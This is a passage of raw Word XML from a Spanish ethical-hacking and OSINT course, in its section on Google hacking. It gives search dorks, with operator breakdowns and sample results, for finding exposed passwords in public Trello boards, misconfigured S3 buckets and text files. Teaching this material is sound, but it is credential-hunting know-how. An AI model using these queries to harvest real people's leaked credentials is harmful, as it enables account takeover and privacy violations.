              <w:t xml:space="preserve"> Páginas cuyo texto contenga "password"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="494F416E" w14:textId="16DA9AC3" w:rsidR="00245F86" w:rsidRDefault="00445023" w:rsidP="00245F86">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00445023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¿Qué encuentra? </w:t>
      </w:r>
      <w:r w:rsidRPr="00445023">
        <w:t>Tableros de Trello expuestos públicamente que contienen emails de Gmail y la palabra "password".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A222B6" w14:textId="77777777" w:rsidR="00445023" w:rsidRPr="00445023" w:rsidRDefault="00445023" w:rsidP="00445023">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00445023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo de resultad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445023" w14:paraId="7F482A3B" w14:textId="77777777" w:rsidTr="00445023">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14CBE85B" w14:textId="77777777" w:rsidR="00445023" w:rsidRPr="00445023" w:rsidRDefault="00445023" w:rsidP="00445023">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445023">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>URL: https://trello.com/b/abc123/proyecto-empresa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9DAA38" w14:textId="77777777" w:rsidR="00445023" w:rsidRDefault="00445023" w:rsidP="00445023">
            <w:r>
              <w:t>Contenido visible:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54982B44" w14:textId="77777777" w:rsidR="00445023" w:rsidRDefault="00445023" w:rsidP="00445023">
            <w:r>
              <w:t>- Usuario: juan@gmail.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A627C53" w14:textId="6CC0B288" w:rsidR="00445023" w:rsidRDefault="00445023" w:rsidP="00445023">
            <w:r>
              <w:t>- Password temporal: 12345</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CC87CFA" w14:textId="77777777" w:rsidR="0004755F" w:rsidRDefault="0004755F" w:rsidP="000845DB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A8115A" w14:textId="3EA07580" w:rsidR="000845DB" w:rsidRPr="000845DB" w:rsidRDefault="000845DB" w:rsidP="000845DB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000845DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000845DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>site:s3.amazonaws.com filetype:xls password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845DB" w:rsidRPr="000845DB" w14:paraId="2637169F" w14:textId="77777777" w:rsidTr="000845DB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D0DFF2" w14:textId="77777777" w:rsidR="000845DB" w:rsidRPr="000845DB" w:rsidRDefault="000845DB" w:rsidP="000845DB">
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">site:s3.amazonaws.com     </w:t>
            </w:r>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Restringe búsqueda solo a buckets de Amazon S3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482C22C7" w14:textId="77777777" w:rsidR="000845DB" w:rsidRPr="000845DB" w:rsidRDefault="000845DB" w:rsidP="000845DB">
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">filetype:xls              </w:t>
            </w:r>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Solo archivos Excel (.xls)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D335B02" w14:textId="603EFA4B" w:rsidR="000845DB" w:rsidRPr="000845DB" w:rsidRDefault="000845DB" w:rsidP="000845DB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">password                  </w:t>
            </w:r>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="000845DB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Que contengan la palabra "password"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B2F76F3" w14:textId="77777777" w:rsidR="000845DB" w:rsidRPr="000845DB" w:rsidRDefault="000845DB" w:rsidP="000845DB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000845DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¿Qué encuentra? </w:t>
      </w:r>
      <w:r w:rsidRPr="000845DB">
        <w:t>Archivos Excel almacenados en buckets de Amazon S3 mal configurados (públicos) que contienen contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F8184F" w14:textId="77777777" w:rsidR="000845DB" w:rsidRPr="000845DB" w:rsidRDefault="000845DB" w:rsidP="000845DB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000845DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo de resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2ADCF" w14:textId="21280E4E" w:rsidR="00445023" w:rsidRDefault="0004755F" w:rsidP="00245F86">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0004755F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18B97E9C" wp14:editId="63012976">
            <wp:extent cx="2773680" cy="1144758"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="3207036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3603" name="Imagen 1" descr="Tabl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8812" cy="11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5D3A" w14:textId="44F2C30F" w:rsidR="0004755F" w:rsidRPr="00B6027B" w:rsidRDefault="0004755F" w:rsidP="0004755F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>intext:"@gmail.com" intext:"password" inurl:/files/ ext:txt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4755F" w:rsidRPr="0004755F" w14:paraId="2EE1460F" w14:textId="77777777" w:rsidTr="00B6027B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36CC9E10" w14:textId="77777777" w:rsidR="0004755F" w:rsidRPr="0004755F" w:rsidRDefault="0004755F" w:rsidP="0004755F">
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">intext:"@gmail.com"       </w:t>
            </w:r>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Texto que contenga exactamente "@gmail.com" (comillas = literal)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D89072" w14:textId="77777777" w:rsidR="0004755F" w:rsidRPr="0004755F" w:rsidRDefault="0004755F" w:rsidP="0004755F">
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">intext:"password"         </w:t>
            </w:r>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Texto que contenga exactamente "password"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292A4DF1" w14:textId="77777777" w:rsidR="0004755F" w:rsidRPr="00C35C7D" w:rsidRDefault="0004755F" w:rsidP="0004755F">
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">inurl:/files/             </w:t>
            </w:r>
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00C35C7D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> URL debe contener "/files/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE218E1" w14:textId="56FCD8F0" w:rsidR="0004755F" w:rsidRPr="0004755F" w:rsidRDefault="0004755F" w:rsidP="0004755F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">ext:txt                   </w:t>
            </w:r>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="0004755F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Extensión del archivo debe ser .txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E36CC1F" w14:textId="77777777" w:rsidR="00B6027B" w:rsidRPr="00B6027B" w:rsidRDefault="00B6027B" w:rsidP="00B6027B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¿Qué encuentra? </w:t>
      </w:r>
      <w:r w:rsidRPr="00B6027B">
        <w:t>Archivos de texto en carpetas llamadas "files" que contienen emails de Gmail y contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37499033" w14:textId="77777777" w:rsidR="00B6027B" w:rsidRPr="00B6027B" w:rsidRDefault="00B6027B" w:rsidP="00B6027B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B6027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo de resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54344599" w14:textId="4D4AEE40" w:rsidR="0004755F" w:rsidRDefault="009E53C6" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E53C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA2E7B0" wp14:editId="5DF7BF19">
            <wp:extent cx="4686300" cy="1105620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20703620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62044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2307" cy="11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F5CD" w14:textId="4A0509F2" w:rsidR="009E53C6" w:rsidRDefault="009E53C6" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009E53C6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Por qué funciona: </w:t>
      </w:r>
      <w:r w:rsidRPr="009E53C6">
        <w:t>Desarrolladores dejan archivos de configuración o logs accesibles públicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CFC4D5" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F0931C" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5ABAD6" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A68C8DA" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8780D7" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3795A9A5" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A28817" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C57DC4C" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E5D57C" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77761043" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E65396" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F42C980" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F757BA2" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0130CB4B" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C353BC" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="750A0C28" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D94330" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B2ED28" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40092E45" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40916A5D" w14:textId="77777777" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="0004755F">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9E4D82" w14:textId="53820800" w:rsidR="004836F9" w:rsidRDefault="004836F9" w:rsidP="004836F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B25916">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00B25916" w:rsidRPr="00B25916">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3 Google Hacking: Comandos y Operadores Booleanos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61197AC0" w14:textId="2986F184" w:rsidR="00B25916" w:rsidRPr="00B25916" w:rsidRDefault="00B25916" w:rsidP="00B25916">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085F1EA" w14:textId="4D95097D" w:rsidR="004836F9" w:rsidRDefault="00B25916" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B25916">
        <w:t>Estos comandos permiten refinar búsquedas y descubrir información sensible o útil dentro de un proceso de hacking ético y de investigación OSINT. A continuación, encontrarás cada uno con su descripción, un ejemplo de uso y la explicación de qué hace específicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2A539A" w14:textId="47A9BAD3" w:rsidR="00943012" w:rsidRDefault="00943012" w:rsidP="00B25916">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00943012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OSINT</w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:t xml:space="preserve">pen </w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:t xml:space="preserve">ource </w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INT</w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:t>elligence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E612D9E" w14:textId="77777777" w:rsidR="00943012" w:rsidRPr="00943012" w:rsidRDefault="00943012" w:rsidP="00943012">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00943012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Definición:</w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:t xml:space="preserve"> Recopilación de información de </w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fuentes públicas y abiertas</w:t>
      </w:r>
      <w:r w:rsidRPr="00943012">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722F213C" w14:textId="21F5E814" w:rsidR="00943012" w:rsidRDefault="007E45F8" w:rsidP="00B25916">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007E45F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resumen en una frase:</w:t>
      </w:r>
      <w:r w:rsidRPr="007E45F8">
        <w:t xml:space="preserve"> OSINT es buscar información útil sobre un objetivo usando solo fuentes públicas disponibles para cualquiera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057014E1" w14:textId="77777777" w:rsidR="004D381A" w:rsidRPr="004D381A" w:rsidRDefault="004D381A" w:rsidP="004D381A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D381A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>define:término</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180AFAE" w14:textId="77777777" w:rsidR="004D381A" w:rsidRPr="004D381A" w:rsidRDefault="004D381A" w:rsidP="004D381A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004D381A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D381A">
        <w:t> Muestra definiciones de diversas páginas web para el término buscado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402DBBBA" w14:textId="77777777" w:rsidR="004D381A" w:rsidRPr="004D381A" w:rsidRDefault="004D381A" w:rsidP="004D381A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004D381A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D381A">
        <w:t> define:osint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587B287" w14:textId="77777777" w:rsidR="004D381A" w:rsidRPr="004D381A" w:rsidRDefault="004D381A" w:rsidP="004D381A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004D381A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D381A">
        <w:t> Devuelve definiciones de “OSINT”, ayudando a comprender su significado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F5215A" w14:textId="77777777" w:rsidR="004D381A" w:rsidRPr="004D381A" w:rsidRDefault="004D381A" w:rsidP="004D381A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D381A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>filetype:término (o ext:término)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DAA33" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRPr="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE172F">
        <w:t> Restringe la búsqueda a documentos con la extensión especificada (PDF, XLS, DOCX, etc.). Útil para localizar informes, listados o archivos confidenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76574E9A" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRPr="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE172F">
        <w:t> filetype:xls "password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6F6641" w14:textId="77777777" w:rsidR="00FE172F" w:rsidRDefault="00FE172F" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE172F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE172F">
        <w:t> Muestra hojas de cálculo en formato XLS que contengan la palabra “password”, pudiendo revelar credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513C01C" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AA1C5E" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E0368E" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1682EA9B" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350BCE0A" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7EE24F" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD0A593" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A2D60C" w14:textId="77777777" w:rsidR="00C10151" w:rsidRDefault="00C10151" w:rsidP="00FE172F">
